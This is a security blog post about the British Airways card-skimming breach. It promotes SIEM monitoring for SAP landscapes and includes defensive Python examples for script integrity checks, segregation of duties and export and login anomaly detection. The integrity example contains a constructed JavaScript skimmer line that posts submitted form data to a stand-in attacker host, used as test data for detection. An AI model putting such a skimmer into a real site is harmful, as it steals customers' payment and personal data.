A question to all organizations, especially the ones running enterprise applications such as SAP®
The BBC recently reported a 'malicious' data breach at British Airways.
On September 6th, 2018, British Airways notified its affected customers of a serious breach. Attackers had exploited a security vulnerability in the company's software starting on 21 August and, for a period of roughly two weeks, stole customers' personal and payment card information (passport details were not affected).
Approximately 380,000 card payments made through the online booking process were compromised. For the airline's customers (you and me) this means not only the possible financial loss and the headache of getting the money back, but also the risk that our identity was stolen, a concern that will accompany the affected passengers for the rest of their lives. Particularly worrying is how long the breach went undetected: we have become a statistic called mean time to identify (MTTI). And this is just one example in a series of serious data breaches. Although awareness of cyber attacks is steadily increasing, companies rarely detect them as a matter of routine; very often an attack is only noticed once the damage has become obvious. So it was with this airline, a very large organization with more than 40,000 employees and an annual turnover of about £12.2 billion.
By the way, the mean time to identify (MTTI) is on average 197 days, and the mean time to contain (MTTC) is 69 days. Please read also our past blog Dealing with cyber threats in the SAP® / ERP application layer.
Unfortunately, attacks on personal data and confidential corporate data are nowadays part of everyday life. What was really shocking here was the duration of the breach and the importance and size of the company concerned. Hundreds of thousands of customers had their sensitive data stolen over a period of weeks: almost 400,000 card transactions were affected, including the corporate credit cards of frequent travellers.
Most people would think that accessing the system and downloading all this data is neither quick nor easy. We looked at how it was done, and it was very easy, script-kiddie stuff: about 20 lines of JavaScript injected into a script served by the website, and that was it. When a customer submitted the booking form, the injected code copied the entered personal and payment data and sent it to a server under the attackers' control. Thank you for submitting your confidential and financial data!
Normally the corporate network keeps track of who is connecting and from where; network packets, protocols, patterns and signatures, incoming and outgoing data are analysed. A Security Operations Center (SOC) or a Network Operations Center (NOC) should DETECT, notify and STOP IT when large amounts of information leave the company, right? So how could the attackers exploit a known vulnerability and compromise the information of hundreds of thousands of people for weeks? That is exactly the problem: the everyday business processes run across so many different IT components, means and channels in the digital chain that you need a very comprehensive and holistic view of all of them, their traffic and their behaviour. Note the caveat this case teaches: the data never had to be downloaded from the back end at all. It was taken in the customer's browser at the moment of submission, so a control that only watches for bulk transfers out of the data centre sees nothing; what changed on the company's side was a single served script.
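The kind of check that would have turned the script modification described above into an alert is baseline-and-compare integrity monitoring of the JavaScript a site actually serves. The following is an added example written for this post; it is not code from the original article or from British Airways. It assumes the operator keeps a known-good digest of every script out of band and periodically fetches the live copies like a customer would; the script paths, script bodies and the attacker host are all constructed for the demo.

```python
# Added example (not code from the original post or from British Airways):
# baseline-and-compare integrity monitoring for the JavaScript a site serves.
# Assumptions: the operator keeps a known-good digest per script out of band;
# paths, script bodies and the attacker host below are constructed for the demo.
import base64
import hashlib
from typing import Dict

def sri_digest(body: bytes, algo: str = "sha384") -> str:
    """Digest in Subresource Integrity notation ('sha384-<base64>').

    The same string can go into <script integrity="..."> so the browser
    refuses to run a script whose hash no longer matches."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"

def check_assets(baseline: Dict[str, str], served: Dict[str, bytes]) -> Dict[str, str]:
    """Compare what is actually served against the baseline.

    Returns path -> 'ok', 'MODIFIED', 'MISSING' or 'UNEXPECTED'."""
    report = {}
    for path, expected in baseline.items():
        body = served.get(path)
        if body is None:
            report[path] = "MISSING"
        elif sri_digest(body) != expected:
            report[path] = "MODIFIED"
        else:
            report[path] = "ok"
    for path in served:
        if path not in baseline:
            report[path] = "UNEXPECTED"  # nobody deployed this on purpose
    return report

# Constructed sample: the library as deployed ...
ORIGINAL_LIB = b"window.SiteLib = {ready: true};\n"
# ... and a constructed skimmer-style tail appended to it. On submit it copies
# the form fields and posts them to a host the attackers control: the data is
# taken in the browser, not downloaded from the back end.
SKIMMER_TAIL = (
    b"document.addEventListener('submit',function(e){"
    b"fetch('https://collect.attacker.example/',"
    b"{method:'POST',body:new FormData(e.target)});});\n"
)

BASELINE = {"/js/site-lib.js": sri_digest(ORIGINAL_LIB)}
SERVED_LATER = {"/js/site-lib.js": ORIGINAL_LIB + SKIMMER_TAIL}

if __name__ == "__main__":
    for path, status in check_assets(BASELINE, SERVED_LATER).items():
        print(f"{status:10} {path}")
    # Pin the known-good copy in the page so the browser enforces it as well:
    print(f'<script src="/js/site-lib.js" integrity="{BASELINE["/js/site-lib.js"]}"></script>')
```

Two practical points: run the fetch from outside the company network, because a skimmer that is only delivered to real customers is invisible to an internal check; and treat the integrity attribute as a second layer, not a replacement, since an attacker who can also edit the HTML can update the hash, whereas the out-of-band baseline still flags the change.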
Unfortunately, British Airways is only the most recent in a series of massive cyber incidents.
But even if this incident had been a coincidence (and it clearly was not, if you look at the injected code), should not the growth of the cyber security market itself give cause for concern? What does that tell you? What does it mean when the predictions say that in 2019 there will be a shortage of 2 million cyber security personnel?
Wake up, folks! Violations, hacks and breaches are commonplace in the industry. The number of attacks is growing, and they are getting smarter. Perhaps a dent to your ego, but you are collateral damage: mostly you are not the target at the start, you just pop up in a vulnerability scan and look like an easy target.
There have been very serious breaches in the past that have compromised companies and stolen millions of user records. In some cases it took several years for the vulnerabilities to be discovered, or the compromised company went out of business, as the USIS example shows:
"Cyber criminals attacked the USIS network in late 2013. However, these activities were not discovered until the following June, giving the attackers at least half a year of undetected access to internal and sensitive information, and the damage is difficult to assess.
This incident once again demonstrates the current lack of awareness of how to protect and monitor SAP systems."
Why are cyber security attacks possible?
IT operations, and especially IT security, are very complex, particularly in times of digitization and Industry 4.0 (the digital transformation). Please read also our past blog SAP® Security nowadays ..... Businesses must provide immediate access to employees, customers and others around the world while keeping cyber criminals out. Some of the factors are:
Patching known vulnerabilities
Software vendors constantly test their software for vulnerabilities (some of them, at least) and regularly release patches. As soon as a patch is released, the search for the vulnerability it fixes and for ways to exploit it begins. The time your IT operations crew needs to upgrade your systems (analyse the configuration, assess the impact, plan the downtime, test, move to production) is the window in which attackers can exploit the newly published vulnerability to gain access to your IT landscape.
Threats from within your own company
If a user can access an IT resource, they can also manipulate and compromise it. Sometimes this happens maliciously, e.g. to enrich oneself or to harm the employer or a colleague; then, for example, a database is sabotaged. More often, however, an insider threat comes from mistakes: a weak password, an unlocked computer left unattended, a USB stick found in the car park, a downloaded document with malware inside, and hundreds of other possibilities.
Missing access controls
Here, less is more! The fewer users that have access to sensitive information, the less likely it is that this information is at risk, and the fewer privileges a user has, the less damage an attacker can do after compromising that user's account. Ideally, each user should have an account whose privileges are tailored exactly to their role, no more. This is often omitted for convenience. Segregation of duties and other compliance controls are often an unloved stepchild; many companies do not segregate responsibilities sufficiently, and their landscapes are correspondingly more exposed to cyber security threats.
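What "segregating responsibilities" means in practice is checking whether any single account can carry out two halves of a transaction that should need two people. The following is an added example, not code from the original post or from SAP: a minimal segregation-of-duties check over role assignments. The transaction codes are standard SAP ones chosen for illustration, but the mapping of codes to business functions, the conflict matrix, the role names and the user list are all constructed for the demo and are not SAP's shipped rule set.

```python
# Added example (not from the original post or from SAP): a minimal
# segregation-of-duties check over SAP-style role assignments. Transaction
# codes are standard SAP ones; the function mapping, conflict matrix, roles
# and users are constructed for the demo.
from typing import Dict, FrozenSet, List, Set, Tuple

# Business functions and the transaction codes that grant them.
FUNCTIONS: Dict[str, Set[str]] = {
    "maintain_vendor_master": {"FK01", "FK02", "XK01", "XK02"},
    "run_payments":           {"F110"},
    "create_purchase_order":  {"ME21N"},
    "post_goods_receipt":     {"MIGO"},
    "maintain_users":         {"SU01"},
    "maintain_roles":         {"PFCG"},
}

# Pairs of functions one person must not hold together.
CONFLICTS: Set[FrozenSet[str]] = {
    frozenset({"maintain_vendor_master", "run_payments"}),   # create a vendor and pay it
    frozenset({"create_purchase_order", "post_goods_receipt"}),
    frozenset({"maintain_users", "maintain_roles"}),         # create a user and give it any role
}

def effective_tcodes(user_roles: List[str], roles: Dict[str, Set[str]]) -> Set[str]:
    """Union of the transaction codes granted by all of a user's roles."""
    out: Set[str] = set()
    for r in user_roles:
        out |= roles.get(r, set())
    return out

def functions_of(tcodes: Set[str]) -> Set[str]:
    """Business functions reachable with the given transaction codes."""
    return {f for f, codes in FUNCTIONS.items() if codes & tcodes}

def sod_violations(users: Dict[str, List[str]],
                   roles: Dict[str, Set[str]]) -> Dict[str, List[Tuple[str, str]]]:
    """Return user -> sorted list of conflicting function pairs that user holds."""
    result: Dict[str, List[Tuple[str, str]]] = {}
    for user, user_roles in users.items():
        held = functions_of(effective_tcodes(user_roles, roles))
        pairs = sorted(tuple(sorted(c)) for c in CONFLICTS if c <= held)
        if pairs:
            result[user] = [(p[0], p[1]) for p in pairs]
    return result

def unmapped_tcodes(user_roles: List[str], roles: Dict[str, Set[str]]) -> List[str]:
    """Transaction codes a user holds that no business function accounts for:
    candidates for removal under least privilege, or for adding to FUNCTIONS."""
    known = set().union(*FUNCTIONS.values())
    return sorted(effective_tcodes(user_roles, roles) - known)

# Constructed sample roles and assignments.
ROLES: Dict[str, Set[str]] = {
    "Z_AP_CLERK":    {"FK01", "FK02", "FB60"},
    "Z_AP_PAYMENTS": {"F110", "F111"},
    "Z_BUYER":       {"ME21N", "ME22N"},
    "Z_WAREHOUSE":   {"MIGO"},
    "Z_BASIS_ADMIN": {"SU01", "PFCG", "SM59"},   # one 'convenience' role for everything
}
USERS: Dict[str, List[str]] = {
    "jdoe":   ["Z_AP_CLERK", "Z_AP_PAYMENTS"],
    "asmith": ["Z_BUYER"],
    "bops":   ["Z_BASIS_ADMIN"],
    "cwh":    ["Z_WAREHOUSE"],
}

if __name__ == "__main__":
    for user, pairs in sod_violations(USERS, ROLES).items():
        for a, b in pairs:
            print(f"SoD violation: {user} holds both '{a}' and '{b}'")
    for user, user_roles in USERS.items():
        extra = unmapped_tcodes(user_roles, ROLES)
        if extra:
            print(f"Review: {user} also has unclassified transactions {extra}")
```

Where a conflict cannot be removed (a small finance team, for example), the usual answer is a mitigating control: the conflicting transaction is logged and reviewed by someone else, which is exactly the kind of event a SIEM should receive.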
So how can you beat Cyber Crime?
You can't (unless you go off grid); for now it is only a matter of trying to keep up with the bad guys. That is unfortunately the truth. You can, however, keep up better and faster!
From our point of view, a 360° approach to real-time monitoring is essential. This is realised by implementing a SIEM strategy: connect your log sources and you at least reduce the mean time to identify, which in turn shortens the mean time to contain. Typically, endpoints such as notebooks and mobile phones are integrated, as are networks, servers and databases, software applications and of course the traditional security solutions such as identity and access management. The mission-critical application, the SAP® system, is usually not integrated at all, or its integration into the SIEM strategy is insufficiently automated.
Let us go back to the beginning. It was about DETECTION: early detection puts unusual processes, downloads, access, locations, transactions and changes on your radar. Had British Airways been able to DETECT such a code injection, the alarm would have gone off within seconds instead of weeks. Please read also our past blog, where we describe the 360° approach of Insight, Prevent, Detect and Respond:
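To make "unusual downloads, access and locations on your radar" concrete, here is an added example (not code from the original post or from any SIEM product) of two detections a SIEM rule would run over application audit events once the application is actually connected: a user exporting more records than that user's own baseline within a short window, and a login from a country never seen for that account. The line format, the per-account baselines and every event are constructed for the demo; a real feed, for instance an SAP audit log forwarded to the SIEM, would be normalised into the same fields first.

```python
# Added example (not from the original post): two SIEM-style detections over
# constructed application audit events. The line format, baselines and every
# event below are constructed for the demo.
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Set, Tuple

class Event(NamedTuple):
    ts: datetime
    user: str
    action: str    # LOGIN or EXPORT
    country: str   # country of the client address
    records: int   # rows exported, 0 for non-export events

def parse(line: str) -> Event:
    """Parse one constructed line: '<iso-time> <user> <action> <country> <records>'."""
    ts, user, action, country, records = line.split()
    return Event(datetime.fromisoformat(ts), user, action, country, int(records))

def bulk_export_alerts(events: List[Event], baseline: Dict[str, int],
                       default: int = 50_000,
                       window: timedelta = timedelta(minutes=10)
                       ) -> List[Tuple[datetime, str, int]]:
    """Alert when a user's exports within `window` exceed that user's baseline.

    The baseline is per account: a nightly batch job and an AP clerk have very
    different 'normal', and a single global threshold would either miss the clerk
    or page on the batch job every night."""
    alerts: List[Tuple[datetime, str, int]] = []
    recent: Dict[str, List[Event]] = defaultdict(list)
    for e in sorted(events, key=lambda x: x.ts):
        if e.action != "EXPORT":
            continue
        q = recent[e.user]
        q.append(e)
        while q and e.ts - q[0].ts > window:   # drop events outside the window
            q.pop(0)
        total = sum(x.records for x in q)
        if total > baseline.get(e.user, default):
            alerts.append((e.ts, e.user, total))
            q.clear()                           # one alert per burst, not per event
    return alerts

def new_country_alerts(events: List[Event], known: Dict[str, Set[str]]
                       ) -> List[Tuple[datetime, str, str]]:
    """Alert on the first login from a country not yet seen for the account,
    then learn it so the same place does not alert again."""
    alerts: List[Tuple[datetime, str, str]] = []
    seen = {u: set(c) for u, c in known.items()}
    for e in sorted(events, key=lambda x: x.ts):
        if e.action != "LOGIN":
            continue
        if e.country not in seen.setdefault(e.user, set()):
            alerts.append((e.ts, e.user, e.country))
            seen[e.user].add(e.country)
    return alerts

# Constructed sample feed: a batch job doing its nightly extract, and a clerk
# whose account is later used from an unfamiliar country to pull 70,000 rows.
SAMPLE_LOG = """\
2018-08-21T02:05:00 svc_batch EXPORT DE 12000
2018-08-21T02:06:00 svc_batch EXPORT DE 12000
2018-08-21T02:07:00 svc_batch EXPORT DE 12000
2018-08-21T02:08:00 svc_batch EXPORT DE 12000
2018-08-21T02:09:00 svc_batch EXPORT DE 12000
2018-08-21T08:10:00 mmueller LOGIN DE 0
2018-08-21T08:12:00 mmueller EXPORT DE 300
2018-08-21T23:40:00 mmueller LOGIN RO 0
2018-08-21T23:41:00 mmueller EXPORT RO 70000
"""
EVENTS = [parse(line) for line in SAMPLE_LOG.splitlines()]
EXPORT_BASELINE = {"svc_batch": 100_000, "mmueller": 5_000}   # constructed
KNOWN_COUNTRIES = {"svc_batch": {"DE"}, "mmueller": {"DE"}}   # constructed

if __name__ == "__main__":
    for ts, user, total in bulk_export_alerts(EVENTS, EXPORT_BASELINE):
        print(f"{ts} BULK EXPORT  {user}: {total} records")
    for ts, user, country in new_country_alerts(EVENTS, KNOWN_COUNTRIES):
        print(f"{ts} NEW COUNTRY  {user} from {country}")
```

Both rules fire on the clerk's account within a minute of the events arriving, which is the difference between a mean time to identify measured in seconds and one measured in months. The rules only work if the application's audit events reach the SIEM at all, which is the integration gap the paragraph above describes.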